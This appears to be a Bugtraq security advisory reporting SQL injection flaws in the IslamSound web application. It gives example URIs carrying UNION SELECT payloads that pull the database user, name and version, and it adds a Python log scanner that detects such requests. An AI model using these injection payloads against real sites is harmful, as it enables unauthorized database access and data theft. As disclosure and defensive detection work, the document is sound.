IslamSound Multiple Remote SQL Injection Vulnerabilities
BID:39880
Info
| Bugtraq ID: | 39880 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 03 2010 12:00AM |
| Updated: | May 03 2010 12:00AM |
| Credit: | JIKO |
| Vulnerable: | IslamSound IslamSound 0 |
| Not Vulnerable: | |
Discussion
IslamSound is prone to multiple remote SQL injection vulnerabilities.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/sound.php?catid=2 sql
http://www.example.com/details.php?linkid=-7 union select user(),1,2,database(),version(),5,6,7,8--
http://www.example.com/send.php?linkid=-5 union select user(),1,2,3,4,5,6,7,8--
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
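With no vendor patch listed, one way to spot requests shaped like the example URIs is to review web server access logs for `catid` or `linkid` values that are not plain integers. The following is an added example, not code from this advisory or from IslamSound; the log lines are constructed, and it assumes a common/combined log format and that legitimate IDs are non-negative integers.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts and parameters named in the advisory's example URIs.
WATCHED = {"/sound.php": "catid", "/details.php": "linkid", "/send.php": "linkid"}
# Assumption: legitimate IDs are plain non-negative integers.
VALID_ID = re.compile(r"[0-9]{1,10}")
# Request field of a common/combined log format line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_requests(log_lines):
    """Return (line_no, script, param, decoded_value) for each watched
    parameter whose value is not a plain integer."""
    hits = []
    for line_no, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        # Match on the script name so installs under a subdirectory count.
        script = "/" + target.path.rsplit("/", 1)[-1].lower()
        param = WATCHED.get(script)
        if param is None:
            continue
        # parse_qsl percent-decodes values and turns '+' into a space.
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            if name == param and not VALID_ID.fullmatch(value):
                hits.append((line_no, script, param, value))
    return hits


# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '198.51.100.7 - - [03/May/2010:10:00:01 +0000] "GET /sound.php?catid=2 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [03/May/2010:10:00:05 +0000] "GET /details.php?linkid=-7%20union%20select%20user(),1,2,database(),version(),5,6,7,8-- HTTP/1.1" 200 4312',
    '198.51.100.9 - - [03/May/2010:10:00:09 +0000] "GET /site/send.php?linkid=-5+union+select+user(),1,2,3,4,5,6,7,8-- HTTP/1.1" 200 4001',
    '198.51.100.9 - - [03/May/2010:10:00:12 +0000] "GET /details.php?linkid=14 HTTP/1.1" 200 4410',
    '198.51.100.9 - - [03/May/2010:10:00:15 +0000] "GET /index.php?linkid=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule can be enforced in front of the application (for example in a reverse proxy or WAF rule) so that non-numeric `catid` and `linkid` values are rejected before they reach the database.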
References
References:
- IslamSound Homepage (IslamSound)